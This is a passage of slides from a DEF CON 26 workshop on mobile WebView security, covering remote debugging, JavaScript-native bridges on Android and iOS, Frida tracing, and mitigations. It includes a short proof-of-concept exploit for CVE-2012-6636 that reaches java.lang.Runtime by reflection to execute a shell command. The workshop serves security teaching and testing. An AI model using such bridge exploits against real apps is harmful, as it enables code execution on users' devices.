![Page 64: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/64.jpg)
64 9 Aug 2018
Remote Debugging via iOS WebKit Adapter
Using the Workshop VM:
1. Connect the iDevice to the VM
2. Make sure the VM can see the device with:
3. Start "Remotedebug iOS Webkit Adapter" with:
4. Instruct Chrome to connect to the adapter on port 9000
5. Select the WebView to inspect from the list
remotedebug_ios_webkit_adapter port=9000
idevicepair pair ideviceinfo
![Page 65: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/65.jpg)
65 9 Aug 2018
Remote Debugging via iOS WebKit Adapter
![Page 66: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/66.jpg)
66 9 Aug 2018
Remote Debugging via iOS WebKit Adapter
![Page 67: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/67.jpg)
67 9 Aug 2018
Remote Debugging via iOS WebKit Adapter
![Page 68: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/68.jpg)
68 9 Aug 2018
Remote Debugging iOS
• What if the app is NOT "Built for testing"? – Use JavaScript-based remote debuggers:
• WEINRE
![Page 69: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/69.jpg)
69 9 Aug 2018
Remote Debugging with WEINRE
• WEb INspector REmote
• JavaScript-based Web Inspector
• No Longer Supported
• Limited functionality
https://people.apache.org/~pmuellr/weinre/docs/latest/Home.html
https://github.com/apache/cordova-weinre
![Page 70: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/70.jpg)
70 9 Aug 2018
Remote Debugging with WEINRE
1. Install using npm
2. Start WEINRE
3. Then visit: http://localhost:8080/ and follow the onscreen instructions.
npm install -g weinre
weinre # by default binds to localhost:8080 weinre --boundHost –all- --httpPort 8080
![Page 71: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/71.jpg)
71 9 Aug 2018
Remote Debugging with WEINRE
• Modify HTML source and add:
• Load WEINRE's script dynamically with the following JavaScript code:
var script = document.createElement('script'); script.onload = function () { console.log("WEINRE script loaded"); }; script.src = "http://weinrehost:8080/target/target-script-min.js#anonymous"; document.head.appendChild(script);
<script src="http://weinrehost:8080/target/target-script-min.js#anonymous"></script>
![Page 72: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/72.jpg)
72 9 Aug 2018
Remote Debugging with WEINRE
![Page 73: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/73.jpg)
73
Practical 1 - Exfiltration
WMB_Practical_1_-_Exfiltration.pdf – Setup testing environment:
• Install apps on Android and iOS • Enable remote debugging
– Exfiltration exercises:
• Android (scenarios 1 and 4) • iOS UIWebView (scenarios 1 and 2) • iOS WKWebView (scenarios 1 and 2)
9 Aug 2018
![Page 74: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/74.jpg)
74 9 Aug 2018
![Page 75: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/75.jpg)
75
JavaScript-Native Bridge
• Need to communicate between JavaScript and native code – Access keychain to retrieve auth tokens
– Access camera and accelerometers
– …
9 Aug 2018
![Page 76: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/76.jpg)
76
JavaScript-Native Bridge
• Android – Invoking JavaScript from native
– Invoking native code from JavaScript
9 Aug 2018
![Page 77: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/77.jpg)
77
Android – Native to JavaScript
Invoke JavaScript from Java:
webView.evaluateJavascript("(function() { return 'Hello'; })();", new
ValueCallback<String>() {
@Override
public void onReceiveValue(String s) {
// s="Hello"
}
});
9 Aug 2018
![Page 78: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/78.jpg)
78
Android – JavaScript to Native
Expose Java methods to JavaScript via addJavaScriptInterface:
public class JavascriptBridge {
@JavascriptInterface
public String getGreetingMessage() {
return "Hello World!";
};
}
webView.addJavascriptInterface(new JavascriptBridge(), "javascriptBridge");
9 Aug 2018
![Page 79: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/79.jpg)
79
Android – JavaScript to Native
Native methods are invoked from JavaScript using:
message = javascriptBridge.getGreetingMessage()
9 Aug 2018
![Page 80: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/80.jpg)
80
Android – CVE-2012-6636
• Remote code execution via JavaScriptInterface
• Android <= 4.1 (JELLY_BEAN, API 16)
• Access Java classes/methods via JavaScript using reflection
9 Aug 2018
![Page 81: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/81.jpg)
81
Android – CVE-2012-6636
Proof of concept exploit:
cmd = ['/system/bin/sh', '-c',
'echo \"Hello World\" > /mnt/sdcard/hello.txt']
runtimeClass = javascriptBridge.getClass().forName('java.lang.Runtime')
runtime = runtimeClass.getMethod('getRuntime',null).invoke(null,null)
runtime.exec(cmd)
9 Aug 2018
![Page 82: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/82.jpg)
82
Android – @JavaScriptInterface
• @JavaScriptInterface annotation is required for exported methods from Android 4.2 (JELLY_BEAN_MR1, API 17) and above – Introduced to fix CVE-2012-6636
• When testing, decompile the App (e.g. using jadx) and search for @JavaScriptInterface. – Works with obfuscated source code!
• Methods are enumerable from JavaScript from Android 5.0 (LOLLIPOP_MR1, API 22) and above.
9 Aug 2018
![Page 83: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/83.jpg)
83
JavaScript-Native Bridge
• iOS UIWebView – Invoking JavaScript from native
– Invoking native code from JavaScript • No inbuilt mechanism into UIWebView
• Workaround based on custom URIs
9 Aug 2018
![Page 84: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/84.jpg)
84
iOS – UIWebView Native to JavaScript
Call JavaScript via stringByEvaluatingJavaScript:
let javaScriptCode = "myJavaScriptFunction('Hello')"
let result = uiWebView.stringByEvaluatingJavaScript(from: javaScriptCode)
9 Aug 2018
![Page 85: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/85.jpg)
85
Follow good practice for XSS prevention
iOS – UIWebView JavaScript to Native
Navigate to custom URI: javascriptbridge://getPassword/ Parse URI, extract parameters
JavaScript Native Code
Invoke JavaScript callback
Define callback function
Callback function reads result from parameters
9 Aug 2018
![Page 86: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/86.jpg)
86
iOS – UIWebView JavaScript to Native
JavaScript Code to invoke native functionality via custom URIs and call back functions:
function getPasswordCallBack(password) {
// Do something with password
console.log(password)
}
document.location = "javascriptbridge://getPassword/"
9 Aug 2018
![Page 87: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/87.jpg)
87
iOS – UIWebView JavaScript to Native
Native Code to handle calls from JavaScript via custom URIs (Swift):
func webView(_ webView: UIWebView, shouldStartLoadWith request: URLRequest, navigationType: UIWebViewNavigationType) -> Bool {
if request.url?.scheme == "javascriptbridge" &&
request.url?.host == "getPassword" {
let javaScriptCallBack = "getPasswordCallBack('Password1')"
uiWebView.stringByEvaluatingJavaScript(from: javaScriptCallBack)
return false // Prevent navigation to URI
} return true }
9 Aug 2018
![Page 88: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/88.jpg)
88
JavaScript-Native Bridge
• iOS WKWebView – Invoking JavaScript from native
– Invoking native code from JavaScript • Inbuilt functionality
• Can still use custom URI workaround
9 Aug 2018
![Page 89: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/89.jpg)
89
iOS – WKWebView Native to JavaScript
Native code to invoke JavaScript code:
let javaScriptCode = "myJavaScriptFunction('Hello World')" wkWebView.evaluateJavaScript(javaScriptCode, completionHandler: nil)
9 Aug 2018
![Page 90: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/90.jpg)
90
iOS – WKWebView JavaScript to Native
Native code to handle calls from JavaScript via WKScriptMessageHandler:
29/12/2017
class JavaScriptBridgeMessageHandler: NSObject, WKScriptMessageHandler {
func userContentController(_ userContentController: WKUserContentController,
didReceive message: WKScriptMessage) {
let messageArray = message.body as! [String]
if messageArray[0] == "getPassword" { let jsCallBack = "getPasswordCallBack('Password1')" message.webView?.evaluateJavaScript(jsCallBack, completionHandler: nil) } } }
let messageHandler = JavaScriptBridgeMessageHandler() wkWVConfiguration.userContentController.add(messageHandler, name: "javaScriptBridge")
![Page 91: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/91.jpg)
91
iOS – WKWebView JavaScript to Native
JavaScript Code to invoke native functionality via WKScriptMessageHandler:
function getPasswordCallBack(password) {
// Do something with password
console.log(password)
}
window.webkit.messageHandlers.javaScriptBridge.postMessage(["getPassword"]);
9 Aug 2018
![Page 92: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/92.jpg)
92
iOS – JavaScript to Native
• How to identify exposed functionality: – Reverse engineer App
– Reverse App’s JavaScript code
– Reverse Android’s version of the App
– Trace calls at runtime using Frida
– …
9 Aug 2018
![Page 93: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/93.jpg)
93 9 Aug 2018
Trace UIWebView Methods with Frida (1/2)
$ frida --codeshare mrmacete/objc-method-observer -n WheresMyBrowser ____ / _ | Frida 11.0.12 - A world-class dynamic instrumentation toolkit | (_| | > _ | Commands: /_/ |_| help -> Displays the help system . . . . object? -> Display information about 'object' . . . . exit/quit -> Exit . . . . . . . . More info at http://www.frida.re/docs/home/ [Local::WheresMyBrowser]-> observeSomething("*[* webView:shouldStartLoadWithRequest*]"); [Local::WheresMyBrowser]-> observeSomething("*[* stringByEvaluatingJavaScript*]");
![Page 94: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/94.jpg)
94
Trace UIWebView Methods with Frida (2/2)
(0x7fe22142d760) -[UIWebView stringByEvaluatingJavaScriptFromString:] stringByEvaluatingJavaScriptFromString: javascriptBridgeCallBack('addNumbers','11.0') 0x1098c18b6 WheresMyBrowser!_T015WheresMyBrowser19UIWebViewControllerC03webE0SbSo0dE0C_10Foundation10URLRequestV19shouldStartLoadWithSC0dE14NavigationTypeO010navigationO0tF [...] RET: (0x7fe22140f0d0) -[WheresMyBrowser.UIWebViewController webView:shouldStartLoadWithRequest:navigationType:] webView: <UIWebView: 0x7fe22142d760; frame = (0 126; 375 492); autoresize = RM+BM; layer = <CALayer: 0x600000237e40>> shouldStartLoadWithRequest: <NSMutableURLRequest: 0x600000218ea0> { URL: javascriptbridge://addNumbers/5/6 } navigationType: 0x5 0x10b18b074 UIKit!-[UIWebView webView:decidePolicyForNavigationAction:request:frame:decisionListener:] [...] RET: nil
![Page 95: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/95.jpg)
95 9 Aug 2018
Trace WKWebView Methods with Frida (1/2)
$ frida --codeshare mrmacete/objc-method-observer -n WheresMyBrowser ____ / _ | Frida 11.0.12 - A world-class dynamic instrumentation toolkit | (_| | > _ | Commands: /_/ |_| help -> Displays the help system . . . . object? -> Display information about 'object' . . . . exit/quit -> Exit . . . . . . . . More info at http://www.frida.re/docs/home/ [Local::WheresMyBrowser]-> observeSomething("*[WKScriptMessage body]"); [Local::WheresMyBrowser]-> observeSomething("*[* evaluateJavaScript*]");
![Page 96: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/96.jpg)
96 9 Aug 2018
Trace WKWebView Methods with Frida (2/2)
(0x7fe22199a800) -[WKWebView evaluateJavaScript:completionHandler:] evaluateJavaScript: javascriptBridgeCallBack('multiplyNumbers','144.0') completionHandler: nil 0x1098a9340 WheresMyBrowser!_T015WheresMyBrowser30JavaScriptBridgeMessageHandlerC21userContentControllerySo06WKUserjK0C_So08WKScriptG0C10didReceivetF JavaScriptBridgeMessageHandler.swift:0 [...] RET: 0x11dcd3008 (0x60000025d610) -[WKScriptMessage body] 0x1098a93b3 WheresMyBrowser!_T015WheresMyBrowser30JavaScriptBridgeMessageHandlerC21userContentControllerySo06WKUserjK0C_So08WKScriptG0C10didReceivetF JavaScriptBridgeMessageHandler.swift:47 [...] RET: ( multiplyNumbers, 32, "4.5" )
![Page 97: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/97.jpg)
97 9 Aug 2018
![Page 98: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/98.jpg)
98 9 Aug 2018
Practical 2 - JavaScript-Native Bridge
• WMB_Practical_2_-_JavaScript-Native_Bridge.pdf
• JavaScript-Native Bridge exercises:
– Android (scenarios 2 and 3)
– iOS UIWebView (scenarios 3 and 4)
– iOS WKWebView (scenario 3)
![Page 99: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/99.jpg)
99 9 Aug 2018
Mitigations - Avoid WebViews
• Avoid using WebViews for simple HTML:
– Use TextViews instead
• Open websites externally in the Mobile Browser
![Page 100: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/100.jpg)
100 9 Aug 2018
Mitigations - Using WebViews (1/2)
• Disable JavaScript, where possible
• Prefer WKWebView to UIWebViews on iOS
• Restrict your app to Android 4.2+, better 5+
• Specify a "safe" base URL when loading data programmatically
• Follow good practice for XSS prevention
![Page 101: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/101.jpg)
101 9 Aug 2018
Mitigations - Using WebViews (2/2)
• Always use TLS (enforce at app/platform level)
• Be frugal exposing native functionality
• Open links externally
• Disable remote debugging on Android
• Treat JavaScript-Native bridges as an untrusted boundary. Implement strict validation.
![Page 102: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/102.jpg)
102 9 Aug 2018
Mitigations - Damage Control
• Implement strict Content Security Policy (CSP) (Using HTTP headers or META tags)
• Encrypt sensitive data on storage
![Page 103: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/103.jpg)
103 9 Aug 2018
![Page 104: Where’s My Browser? - DEF CON CON 26/DEF CON 26 workshops...– Xcode – Android Studio + Chrome • Alright: – Laptop with Linux or Windows – Android Studio + Chrome – Virtualbox](https://reader033.vdocuments.us/reader033/viewer/2022060521/604fec2c87b8dd2fc05b68fb/html5/thumbnails/104.jpg)
104
The End. Thank You! Instructors: David Turco (@endle__) Jon Overgaard Christiansen Where's My Browser Project Website: https://authenticationfailure.com/wmb
Where's My Browser GitHub Repository: https://github.com/authenticationfailure/WheresMyBrowser.Android https://github.com/authenticationfailure/WheresMyBrowser.iOS
Context Information Security: https://www.contextis.com/
9 Aug 2018